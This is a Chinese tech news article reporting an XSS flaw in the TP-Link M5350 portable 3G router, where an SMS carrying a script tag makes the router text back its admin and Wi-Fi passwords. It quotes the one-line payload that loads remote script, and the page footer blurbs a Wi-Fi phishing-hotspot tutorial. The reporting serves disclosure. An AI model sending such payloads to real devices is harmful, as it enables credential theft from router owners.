神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码

简介: 本文讲的是神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码,TP-Link的设备漏洞库又增新丁。 这次的主角是TP-Link M5350,一款便携式3G路由器。
本文讲的是 神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码TP-Link的设备漏洞库又增新丁。

这次的主角是TP-Link M5350,一款便携式3G路由器。

Bleeping Computer报道,德国安全研究员Jan Hörsch发现,该款路由器存在一枚神奇漏洞,向路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。

这是条什么短信呢?

<script src=//n.ms/a.js></script>
(不用试,研究员早把脚本下线了)

神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码

漏洞效果图

懂行的读者应该已经知道是怎么回事了。没错,这就是XSS(跨站脚本攻击)漏洞。

作为3G路由器,TP-Link M5350支持短信收发功能,但在短信功能位置未做好过滤,以至于产生漏洞。

类似漏洞在互联网产品上比较常见,但能造成此等效果也很罕见,目测是TP-Link内部安全流程没能留意到。

听着厉害,不过想利用漏洞得先搞清楚使用者的3G上网卡号码,难度也不小。

比较奇葩的是,TP-Link目前应该还没修复漏洞。SecurityAffairs专门找了M5350的官方产品页(澳洲版),发现这款路由最新的固件发布日期是2015年1月,显然不是修复版。嘶吼也检索了一番,了解到M5350主要在海外卖,京东淘宝都没有,国内想研究的童鞋显然没啥机会了。




原文发布时间为:2017年4月12日
本文作者:longye
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
网络协议 网络安全
网络电话机防火墙功能的作用和配置
网络电话机防火墙功能的作用和配置
|
XML 开发工具 数据安全/隐私保护
freeswitch软电话配置、结合讯时网关,外线电话呼入、呼出配置
文章目录 软电话配置 配置外部电话呼入sip软电话 配置sip软电话呼出 交换机后台配置 参考资料 软电话配置
1787 0
|
网络安全 数据安全/隐私保护 网络虚拟化
|
安全 网络协议 数据安全/隐私保护
|
Web App开发 关系型数据库 MySQL
实用教程:快速搭建Wi-Fi钓鱼热点
本文讲的是实用教程:快速搭建Wi-Fi钓鱼热点,在本教程中,我们将创建一个由恶意Wi-Fi接入点提供的网络钓鱼页面。如果受害者在此页面中输入其详细信息,则将直接发送给您。
3234 0